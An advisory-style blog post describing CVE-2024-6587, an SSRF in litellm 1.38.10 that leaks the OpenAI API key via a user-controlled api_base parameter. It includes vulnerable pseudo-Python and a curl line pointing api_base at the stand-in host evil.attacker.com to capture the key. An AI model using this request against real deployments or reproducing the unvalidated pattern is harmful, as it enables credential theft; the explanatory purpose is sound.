CVE CyberSecurity Database News

CVE-2024-6587 - How an SSRF in berriai/litellm 1.38.10 Can Leak Your OpenAI API Key

Poster -

In June 2024, a vulnerability—CVE-2024-6587—was identified in berriai/litellm, a popular library for interacting with OpenAI’s and other LLM providers’ APIs. This post breaks down how a simple parameter, api_base, can be abused to send sensitive API keys to an attacker’s server, and explains how you can protect your systems.

What is litellm?

litellm is a Python library that provides a unified API for different LLM providers. You can use it to call OpenAI, Azure, Anthropic, and more, simply by changing a few parameters.

The project has thousands of downloads and is commonly used on the backend of AI web applications or internal LLM tools.

The Vulnerability: SSRF and API Key Leak

Server-Side Request Forgery (SSRF) lets an attacker make your server send HTTP requests to domains of their choosing. In litellm 1.38.10, the /chat/completions endpoint accepts a user-controlled parameter named api_base. If you provide an api_base, the application's backend will send the LLM request to that domain—instead of the default API endpoint.

The real issue: your backend will also include the OpenAI API key as an authentication header in that request. If an attacker sets up a malicious server, they can steal your API key.

CVE Details

- Project: berriai/litellm

Version Affected: <= 1.38.10

- Endpoint: POST /chat/completions

Attacker sets up a malicious server that logs all incoming requests.

2. A victim user submits a chat completion via litellm, but sets api_base to the attacker’s server.

Suppose you have an API exposed like this (pseudo-Python)

@app.route("/chat/completions", methods=["POST"])
def chat_completions():
    request_json = request.json
    api_base = request_json.get("api_base", "https://api.openai.com";)
    # ...other params...
    headers = {
        "Authorization": f"Bearer {OPENAI_API_KEY}"
    }
    response = requests.post(
        f"{api_base}/v1/chat/completions",
        json=...,  # your payload
        headers=headers
    )
    return response.json()

Now, here is how an attack works via curl

curl -X POST https://vulnerable.app/chat/completions \
    -d '{"api_base": "https://evil.attacker.com"}';

On evil.attacker.com, a web server listens and dumps all headers and bodies from incoming requests. Voilà—the attacker now has your OPENAI_API_KEY.

If you use litellm

1. Update immediately to a fixed version (watch the litellm changelog).

References

- NVD entry: CVE-2024-6587 *(link when available)*
- berriai/litellm GitHub
- OWASP SSRF Explanation
- API key best practices by OpenAI

Final Thoughts

CVE-2024-6587 is a textbook lesson in why you must sanitize all user input, especially if any of it is used to build outbound requests. If you’re running any AI infrastructure—or exposing your backend to user-provided hosts—audit your code to look for trust boundaries like this.

Timeline

Published on: 09/13/2024 16:15:04 UTC
Last modified on: 09/20/2024 14:55:16 UTC